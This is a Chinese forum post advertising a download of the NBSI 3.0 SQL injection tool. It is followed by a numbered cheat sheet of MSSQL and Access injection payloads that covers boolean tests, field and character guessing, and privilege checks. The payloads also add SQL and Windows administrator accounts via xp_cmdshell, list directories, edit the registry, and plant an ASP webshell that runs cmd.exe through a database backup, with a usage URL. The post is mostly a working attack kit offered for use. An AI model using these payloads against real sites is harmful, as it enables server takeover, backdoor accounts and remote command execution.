找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 14|回复: 0

nbsi网站漏洞检测工具

[复制链接]

32万

主题

0

回帖

96万

积分

超级版主

积分
964681
发表于 2025-3-14 12:30:59 | 显示全部楼层 |阅读模式
软件标签:  nbsi   sql
nbsi 3.0纯净版是一款专业的网站漏洞检测工具,使用该软件用户可以快速的检测网站漏洞,检测结果精准,速度快,可以快速的提高该行业人员办公效率,欢迎来绿色资源网下载!
nbsi 3.0纯净版简介
本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由vb语言编写的网站漏洞检测工具的名称,asp注入漏洞检测工具,特别在sql server注入检测方面有极高的准确率。
nbsi官方版使用说明
1.判断是否有注入

;and 1=1

;and 1=2

2.初步判断是否是mssql

;and user>0

3.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0access

4.注入参数是字符

“and [查询条件] and ““=“

5.搜索时没过滤参数的

“and [查询条件] and “%25“=“

6.猜数据库

;and (select count(*) from [数据库名])>0

7.猜字段

;and (select count(字段名) from 数据库名)>0

8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)

;and 1=(select is_srvrolemember(“sysadmin“));--

;and 1=(select is_srvrolemember(“serveradmin“));--

;and 1=(select is_srvrolemember(“setupadmin“));--

;and 1=(select is_srvrolemember(“securityadmin“));--

;and 1=(select is_srvrolemember(“diskadmin“));--

;and 1=(select is_srvrolemember(“bulkadmin“));--

;and 1=(select is_member(“db_owner“));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell “net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add“

;--

;exec master.dbo.xp_cmdshell “net user username

password /add“;--

;exec master.dbo.xp_cmdshell “net localgroup

administrators username /add“;--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree “c:“

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not

in(“上步得到的paths“))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs “c:“;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree “c:“;-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell “type c:webindex.asp“;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues “hkey_local_machine“,

“softwaremicrosoftwindowscurrentversion
un“ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread “hkey_local_machine“,

“softwaremicrosoftwindowscurrentversion“,

“commonfilesdir“ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种reg_sz 表示字符型,reg_dword 表示整型

;exec xp_regwrite “hkey_local_machine“,

“softwaremicrosoftwindowscurrentversion“,

“testvaluename“,“reg_sz“,“hello“ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue “hkey_local_machine“,

“softwaremicrosoftwindowscurrentversion“,

“testvaluename“ 删除某个值

xp_regdeletekey “hkey_local_machine“,

“softwaremicrosoftwindowscurrentversion        estk
ey“ 删除键,包括该键下所有值
14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (“<% dim oscript %>“);

backup database model to disk=“c:l.asp“;

15.mssql内置函数

;and (select @@version)>0 获得windows的版本号

;and user_name()=“dbo“ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (“<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>“);

backup database model to disk=“g:wwwtestl.asp“;

请求的时候,像这样子用:

http://ip/l.asp?c=dir

解压密码:www.down80.com


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|ziyuan80.com

GMT+8, 2025-8-10 04:34 , Processed in 0.077425 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表